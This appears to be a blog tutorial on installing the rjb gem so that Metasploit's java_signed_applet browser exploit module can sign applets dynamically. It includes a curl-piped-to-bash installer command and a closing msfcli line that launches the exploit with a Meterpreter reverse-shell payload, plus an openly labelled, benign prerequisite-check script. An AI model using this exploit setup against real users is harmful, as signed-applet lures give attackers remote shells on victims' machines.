Java_signed_applet with RJB

I just wasted a lot of time trying to get the java_signed_applet exploit module working in Metasploit. Not that it doesn't work by default, but you will get the warning:

[-] 
[-] The JDK failed to initialized: no such file to load -- rjb
[-] In order to dynamically sign the applet, you must install the Java Development Kit, the rjb gem, and set the JAVA_HOME environment variable.
[-] 
[-] Falling back to static signed applet.  This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored.
[-] 

More importantly, your applet will not display the message you want it to, and when I tried it, the payloads I would want to run like java/meterpreter/reverse_tcp weren’t working either. So you need the rjb (Ruby Java Bridge) gem.

Unfortunately, the version of ruby that is included with the default installer does not contain the rjb gem that the java_signed_applet module needs. Even more unfortunately, the header files needed to build the gem are not present either, and trying to copy them in and build the gem there produces many errors and much frustration. The easiest way is to either use a new install of ruby, or just steal the gem from another install of ruby, which is what I will show here. The following instructions work on Ubuntu Linux. Adapt as needed for your OS.

First make sure you have the latest Metasploit version. Go to http://www.metasploit.com/framework/download/ and download and install the latest version for your OS. Make sure you get the installer that includes Java! Then run msfupdate to make sure you are set. If you get a newer version, replace framework-3.5.2 in all the following commands with whichever version of Metasploit you get.

Next make sure you can compile stuff and check out git repositories, and point the environment to the framework’s install of Java.

sudo apt-get install build-essential autoconf bison zlib1g-dev libssl-dev libreadline5-dev libxml2-dev libsqlite3-dev curl git
export JAVA_HOME=/opt/framework-3.5.2/java/

Next install rvm. Commands from http://rvm.beginrescueend.com/rvm/install/

bash < <( curl http://rvm.beginrescueend.com/releases/rvm-install-head )
source ~/.rvm/scripts/rvm

Use rvm to get another copy of ruby and install rjb.

rvm install 1.9.2
rvm use 1.9.2
gem install rjb

Copy the compiled gem over to the Metasploit folder. Check the version numbers in these paths (the rvm ruby and the framework's gem directory) to make sure they match your install.

sudo cp -r ~/.rvm/gems/$RUBY_VERSION/gems/rjb*/ /opt/framework-3.5.2/ruby/lib/ruby/gems/1.9.1/gems/

Now it should work. Test it out!

msfcli multi/browser/java_signed_applet TARGET=0 PAYLOAD=java/meterpreter/reverse_tcp LHOST=127.0.0.1 URIPATH=/ 'CERTCN=It Works Inc.' E

And don't delete either installed copy of ruby (the rvm one or Metasploit's own).
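Added example, not from the original post: a small POSIX shell check for the three prerequisites the warning above names (a JDK under JAVA_HOME, the rjb gem in the framework's own gem directory, and the framework's ruby being able to load it). The function name check_rjb_prereqs and the framework-3.5.2 paths are assumptions that mirror the post's layout; adjust them for your version.

```shell
#!/bin/sh
# Added example (not from the original post). Checks the prerequisites that the
# java_signed_applet module needs before it will dynamically sign the applet.
# Layout assumed: FRAMEWORK_DIR/ruby/bin/ruby and
# FRAMEWORK_DIR/ruby/lib/ruby/gems/1.9.1/gems, as in the post's framework-3.5.2.

# check_rjb_prereqs FRAMEWORK_DIR [JAVA_HOME]
# Prints one line per check and returns 0 only when every check passes.
check_rjb_prereqs() {
  fw="$1"
  jh="${2:-$JAVA_HOME}"
  status=0

  # 1. A JDK, not just a JRE: signing needs javac and jarsigner.
  if [ -n "$jh" ] && [ -x "$jh/bin/javac" ] && [ -x "$jh/bin/jarsigner" ]; then
    echo "ok   JDK found at $jh"
  else
    echo "FAIL JAVA_HOME unset or no javac/jarsigner under '$jh'"
    status=1
  fi

  # 2. An rjb-* gem directory where the post copies it to.
  gemdir="$fw/ruby/lib/ruby/gems/1.9.1/gems"
  rjb=$(ls -d "$gemdir"/rjb-* 2>/dev/null | head -n 1)
  if [ -n "$rjb" ]; then
    echo "ok   rjb gem at $rjb"
  else
    echo "FAIL no rjb-* directory in $gemdir"
    status=1
  fi

  # 3. The framework's own ruby can actually require rjb. This catches a native
  #    extension built against a different ruby, which a plain directory copy
  #    will not reveal until msfcli prints the fallback warning.
  rb="$fw/ruby/bin/ruby"
  if [ -x "$rb" ]; then
    if JAVA_HOME="$jh" "$rb" -e 'require "rjb"' >/dev/null 2>&1; then
      echo "ok   $rb can require rjb"
    else
      echo "FAIL $rb cannot require rjb (check the ruby/gem version numbers)"
      status=1
    fi
  else
    echo "skip no ruby binary at $rb, require test not run"
  fi
  return $status
}
```

Run it as `check_rjb_prereqs /opt/framework-3.5.2` (with JAVA_HOME exported as in the setup step) before running msfcli; a FAIL line tells you which of the three conditions in the warning is still unmet.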

And definitely don't decide to install jruby instead because you think jruby won’t need a Java bridge or it will be easier to make work. Because it won’t. I tried that too.
